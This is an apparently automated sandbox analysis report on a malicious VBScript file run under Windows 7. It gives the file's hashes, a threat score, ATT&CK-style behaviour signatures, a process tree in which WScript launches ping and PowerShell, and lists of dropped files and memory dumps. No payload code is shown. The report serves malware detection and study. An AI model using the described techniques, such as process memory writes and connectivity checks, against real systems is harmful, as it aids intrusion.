Analysis

  • max time kernel
    206s
  • max time network
    207s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-11-2024 21:21

General

  • Target

    B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs

  • Size

    29KB

  • MD5

    34bdef2ccee6d2e4c44bdde97100ee72

  • SHA1

    c57af676764256de944346904ff895f1b6a6b649

  • SHA256

    b3cbe99653473f02e9059a76d009e0e0e88763c8cb2a8e4ddf21b189761bd6f5

  • SHA512

    8c0bb687c5566051dccf596e4532ad2da09729d7c7de603037bbcd97235dd7dc2d7ac3f526660640cae06d2f5772dc69d8bc8163d2516f07152f58a19bc3d05f

  • SSDEEP

    384:XrCiPWsGHGX54OfdYFFYF2Iq4cS5Jw7lOBn:XeYAGp4S5Jw7lOBn

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B3CBE99653473F02E9059A76D009E0E0E88763C8CB2A8E4DDF21B189761BD6F5.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2296

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabCE39.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/2296-20-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/2296-21-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2296-22-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

  • memory/2296-23-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-24-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-25-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-26-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-27-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-28-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2296-29-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

    Filesize

    4KB

  • memory/2296-30-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

    Filesize

    9.6MB